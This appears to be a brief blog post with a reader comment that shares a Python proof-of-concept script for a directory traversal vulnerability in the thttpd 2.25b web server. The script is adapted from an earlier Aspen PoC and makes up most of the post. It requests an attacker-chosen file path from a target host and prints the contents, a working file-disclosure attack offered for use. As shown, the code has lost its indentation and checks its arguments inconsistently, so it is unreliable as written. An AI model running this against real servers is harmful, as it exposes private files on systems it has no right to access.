Hi,
few minutes ago I saw at seclist.org description of directory traversal vulnerability very similar to this one related to Aspen 0.8.
Proof of concept created for Aspen-vuln can be used here after a little modification :)
Code below:
#!/usr/bin/env python
#
# Thttpd 2.25b directory traversal found by Metropolis (http://metropolis.fr.cr)
# simple poc by : http://HauntIT.blogspot.com
#
import sys
import urllib
if len(sys.argv) < 2:
sys.stderr.write('usage: localhost /file/you/wanna/check')
sys.exit(1)
else:
testbug = sys.argv[1]+':80'+sys.argv[2]
print testbug
sock = urllib.urlopen(testbug)
response = sock.readlines()
i=0
print 'Testing: ',testbug
for line in response:
i+=1
print line
# ---
Good job Metropolis! :)
Cheers o/
@HauntIT Nice work
ReplyDeleteMetropolis